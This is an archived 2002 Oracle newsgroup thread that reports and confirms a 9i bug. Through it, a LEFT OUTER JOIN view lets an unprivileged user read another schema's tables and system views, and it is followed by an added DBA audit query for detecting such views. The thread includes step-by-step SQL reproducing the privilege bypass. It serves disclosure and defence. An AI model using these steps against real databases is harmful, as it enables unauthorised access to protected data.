Oracle FAQ Your Portal to the Oracle Knowledge Grid

Newsgroup: c.d.o.server

Re: 9iDB Security Hole?

From: Richard Kuhler <noone_at_nowhere.com>
Date: Mon, 15 Apr 2002 17:47:22 GMT
Message-ID: <KmEu8.48281$zN.21805923@twister.socal.rr.com>


Confirmed with 9.0.1.0.0 on Linux
Confirmed with 9.0.1.0.0 on Solaris

Also confirmed with system views on both...

SQL > desc sys.v$session;
ERROR:
ORA-04043: object sys.v$session does not exist

SQL > desc sys.v$lock;
ERROR:
ORA-04043: object sys.v$lock does not exist

SQL > select v$session.sid from sys.v$lock left outer join sys.v$session on v$lock.sid = v$session.sid;

       SID
         2

...

Richard Kuhler

"Vladimir M. Zakharychev" wrote:
>
> Anyone with 9i can confirm this?
>
> From: news [mailto:news_at_host.talk.ru] On Behalf Of ...
> ...relcom.comp.dbms.oracle
>
> connect system/****@database
> CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY
> TABLESPACE temp;
> CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY
> TABLESPACE temp;
> Grant Create Session To us1;
> Grant Create Session To us2;
> Grant Create Table To us1;
> grant unlimited tablespace to us1;
> Grant Create View To us2;
>
> Connect us1/us11@database;
> Create Table t1(c1 Number(1));
> Insert Into t1(c1) Values(9);
> Create Table t2(c1 Number(1));
> Insert Into t2(c1) Values(9);
>
> commit;
> Connect us2/us12@database;
>
> SQL> Select * From us1.t1;
> ORA-00942: table or view does not exist
> -- this is expected
> SQL> Select * From us1.t2;
> ORA-00942: table or view does not exist
> -- this one too
> SQL> Create View aa As Select * From us1.t1;
> ORA-00942: table or view does not exist
> -- and this one
> SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1
>      From us1.t1 Left Outer Join us1.t2 On t1.c1 = t2.c1;
>
> View created
> -- now this one is NOT !!!!!
> SQL> select * from aa;
>
> T1_C1 T2_C1
> ----- -----
>     9     9
>
> This effectively means that LEFT OUTER JOIN allows creating views
> on tables that are normally not visible (provided that the unprivileged user
> knows the table and column names).
> If you can confirm this basic example, can you also try it on system
> catalog tables/views? If you cannot confirm, please specify your version
> and platform so that we know which ones are not affected (the poster didn't
> specify a version, but I suggest it's 9.0.1.1 on either NT or Linux).
>
> --
> Vladimir Zakharychev (bob@dpsp-yes.com) http://www.dpsp-yes.com
> Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
> All opinions are mine and do not necessarily go in line with those of my employer.
Received on Mon Apr 15 2002 - 12:47:22 CDT
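The thread shows that an ANSI outer join could let a user with only CREATE VIEW define a view over tables they had never been granted access to. A DBA who wants to find out whether such views already exist in an instance can compare each view's dependencies against the direct object grants held by the view owner. The query below is an added example written for this page; it is not from the thread or from Oracle, and it assumes DBA access to the data dictionary views DBA_DEPENDENCIES, DBA_TAB_PRIVS and DBA_SYS_PRIVS. Oracle resolves privileges for a definer-rights view through direct grants only (grants received via a role do not count), so role membership is deliberately not consulted.

```sql
-- Added audit query (not from the thread): list views whose owner holds no
-- direct SELECT grant on a referenced table or view in another schema and
-- no SELECT ANY TABLE system privilege. Any row returned is a view that
-- should not have been creatable through the normal privilege check and
-- deserves a look. Run as a DBA.
SELECT d.owner            AS view_owner,
       d.name             AS view_name,
       d.referenced_owner,
       d.referenced_name,
       d.referenced_type
  FROM dba_dependencies d
 WHERE d.type = 'VIEW'
   AND d.referenced_type IN ('TABLE', 'VIEW')
   AND d.referenced_owner <> d.owner
   -- ignore views owned by the dictionary owner itself
   AND d.owner <> 'SYS'
   -- no direct object grant to the view owner or to PUBLIC
   -- ('READ' exists only in later releases; it simply never matches on 9i)
   AND NOT EXISTS (
         SELECT 1
           FROM dba_tab_privs p
          WHERE p.owner      = d.referenced_owner
            AND p.table_name = d.referenced_name
            AND p.grantee    IN (d.owner, 'PUBLIC')
            AND p.privilege  IN ('SELECT', 'READ'))
   -- and no SELECT ANY TABLE system privilege granted directly
   AND NOT EXISTS (
         SELECT 1
           FROM dba_sys_privs s
          WHERE s.grantee   = d.owner
            AND s.privilege = 'SELECT ANY TABLE')
 ORDER BY d.owner, d.name;
```

In the scenario from the thread, the view us2.aa would be reported with referenced_owner us1 and referenced_name t1 and t2, since us2 was never granted SELECT on either table. Views that appear here on a patched release are worth dropping or re-examining, because the privilege check is only enforced at view creation time and an already-created view keeps working.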
